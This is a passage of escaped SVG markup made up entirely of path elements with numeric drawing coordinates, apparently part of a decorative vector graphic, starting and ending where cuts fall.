d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path 